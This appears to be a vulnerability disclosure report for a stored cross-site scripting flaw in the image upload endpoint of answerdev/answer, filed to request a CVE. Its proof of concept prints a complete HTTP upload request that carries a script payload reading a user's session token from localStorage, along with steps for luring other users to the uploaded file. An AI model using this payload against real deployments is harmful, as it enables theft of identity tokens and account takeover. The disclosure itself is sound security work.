Image upload function has storage xss vulnerability in answerdev/answer
Reported on
Jan 12th 2023
Description
Malicious users can upload files containing malicious html code through this vulnerability, resulting in the theft of identity tokens of other users/administrators accessing related pages and the account being taken over
Proof of Concept
step1. Log in to a common user account
step2. Send the following http request message to upload the image
POST /answer/api/v1/file HTTP/1.1
Host: localhost:9080
Authorization: 5f61e241-91a4-11ed-a458-0242ac110002
Content-Type: multipart/form-data; boundary=---------------------------133113666429484033361737701471
Content-Length: 392
-----------------------------133113666429484033361737701471
Content-Disposition: form-data; name="source"
post
-----------------------------133113666429484033361737701471
Content-Disposition: form-data; name="file"; filename="mini.tif"
Content-Type: image/jpeg
<script>alert(localStorage.getItem('_a_lui_'))</script>
-----------------------------133113666429484033361737701471--
step3. Send the URL(http://localhost:9080/uploads/post/4KdbYyp9F4E.tif) to other users, or publish the URL to the question or answer to induce other users to click. Once another user clicks on the URL, identity tokens are stolen
Impact
Malicious users can upload files containing malicious html code through this vulnerability, resulting in the theft of identity tokens of other users/administrators accessing related pages and the account being taken over
Hi Team, Could you help me apply for a CVE ID for this vulnerability?Thanks